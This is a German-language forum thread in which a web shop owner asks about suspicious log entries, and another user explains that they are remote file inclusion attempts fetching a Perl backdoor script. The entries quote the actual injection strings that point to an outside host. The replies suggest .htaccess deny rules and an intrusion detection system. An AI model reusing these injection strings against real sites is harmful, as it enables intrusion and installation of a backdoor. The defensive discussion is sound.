Dringend - Hackversuch?

    Ich habe in meinem Shop heute regelmäßig (commerce seo 1.1) unter "Wer ist online?" heute Einträge, wie:

    Guest 210.172.183.50 08:16:38 08:16:38 ///?_SERVER[DOCUMENT_ROOT]=http://rakuikumama.net/pages/jcok.xpp??

    und

    Guest 210.172.183.50 08:16:34 08:16:34 ///?_SERVER[DOCUMENT_ROOT]=http://rakuikumama.net/pages/jprinter.xpp??

    und

    Guest 210.172.183.50 08:16:30 08:16:30 ///?_SERVER[DOCUMENT_ROOT]=test??

    Die beiden xpp-Dateien lassen sich herunterladen. Was sind das für Versuche und kann der Hacker hier etwas erreichen, auslesen oder beschädigen?

    Danke

    hoi,

    ich habe mir die seite mal angesehen. es handelt sich mit großer wahrscheinlichkeit um eine sicherheitskritische seite!
    schau bitte mal in deinem %tmp%-ordner ob du eine datei namens vcok.xpp dort findest! falls ja, bitte umgehend entfernen (am besten per av in quarantäne verschieben lassen und zum hersteller senden).

    greetz, me

    habe mir die anderen xpp dateien auch mal angeschaut.

    die ziehen die vcok.xpp herunter welche dann ein backdoor-shell-skript via perl ausführt, und eine backdoor einrichtet.
    du solltest auf deinem server mal das tmp verzeichnis begutachten (nicht lokal -> sorry mein fehler)!

    falls du bei einem großen hoster bist, musst du dir nicht zwingend sorgen machen, der sollte solche skripte eigentlich heraus filtern.

    man kann in der htaccess auch komplette domains sperren.

    Code
    #unter 
order allow, deny
deny from .domain.de
#auch ip ist möglich:
deny from 10.10


allow from all

    guckst du hier


    greetz, me

    Besten Dank

    Aber ein "echter" Hacker wird wohl nicht immer die gleiche IP haben.

    Ich dachte an einen Ausschluss in der htaccess, wenn z.B. [SERVER_ ... ] in der URL steht

    hoi,

    es kommt immer darauf an was man absichern will. ein ids (instrusion detection system) ist grundsätzlich eine gute idee, aber die leistungsfähigkeit solcher id-systeme differiert eben.
    für standard (script-kiddy) attacken, ist phpIDS denke ich eine gute idee. ABER: 100% sicherheit wirst du NIE erreichen.
    klar kann man dem angreifer seinen weg zum glück (oder zum root ;) ) mit verschieden mitteln erschweren (IDS, DMZ, firewall, etc.), aber vor vermeintlich banalen techniken wie social-engeneering können auch diese mittel nicht schützen!

    zu deiner frage, bezüglich des filterns vom SERVER_-array:
    "leider" benötigt eine normale php-webware diese variablen um vernünftig arbeiten zu können. soll heissen, wenn man anfängt diese variablen zu "beschneiden", wird die grundsätzliche funktionalität sehr, bis zu stark eingeschränkt. ergo, keine gute idee.

    sicher wird ein echter hacker/spider/cracker/was-weiss-denn-ich nicht immer mit der selben ip durchs netz "geistern", allerdings sind solche seiten wie die die versucht hat bei dir ihre vcop.xpp (intern ein perl. bzw shell-script), hochzuladen, relativ einfach über die .htaccess filter-, bzw. blockierbar.
    problem hierbei ist nur das es eine menge solcher seiten im netz gibt, d.h. es wird via htaccess schwer bis unmöglich.
    besser wäre da eben ein lernfähiges ids, welches eine blacklist anlegt und angreifer seiten/ips stetig erweitert (ähnlich dem verhalten von ipcop).

    die entscheidung obliegt also bei dir und den möglichkeiten die dir dein hoster zur verfügung stellt.


    greetz, me

    2 Mal editiert, zuletzt von nico (12. Juni 2011 um 11:17)